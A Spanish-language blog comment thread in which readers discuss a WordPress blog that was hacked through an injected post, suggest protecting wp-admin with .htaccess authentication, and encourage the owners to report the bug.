Lo que sí parece seguro es que no insertaron el código modificando los archivos, si no modificando la base de datos (el post).
No lo he probado, pero a lo mejor si hacen un .htaccess que obligue a autentificación HTTP independiente del Wordpress en la carpeta wp-admin, estarían un poco más seguras.
El problema que les ha sucedido no es tan grave como lo sucedido con mename y la red de blog de WeblogsSL a ellos les tumbaron completamente el servicio utilizando ataques DDoS que por mas seguridad que hayan tenido no hallaron la solución en días y esto no tenia nada que ver si utilizaban tal o cual CMS esto pasa por que existen personas inescrupulosas que buscan desfasar ciertas paginas y ha saber dios del por que lo hacen, solo les digo que no se desalienten y nada solo a seguir adelante y reporten el bug en wordpress que de seguro hallaran muy pronto la solución.
Como dato extra conozco de un caso donde los que reportaron un Bug en una versión anterior del wordpress aparecieron en la primera pagina de la actualización del Wordpress que si no me equivoco tenia pagerank 6 . Haber si uds. son las primeras en publicar el error.
Willy… bueno, esa es otra manera de motivar a estas chicas a reportar un bug, en vez de que lo hagan por el simlpe hecho de contribuír que lo hagan a cambio de un buen enlace
yo en una pagina tengo wordpress y aguanta muchisimos ataques por día, el log esta lleno, yo creo que tiene que ver con ustedes (sin ofender he!), tal vez algun Plugin desactualizado o con algun bug que ustedes no sepan, nose que decirles…
[...] ayer habíamos dicho que nuestro blog fué atacado y hackeado, dado que todos los usuarios que acceden a algunos posts de nuestro blog encontraran [...]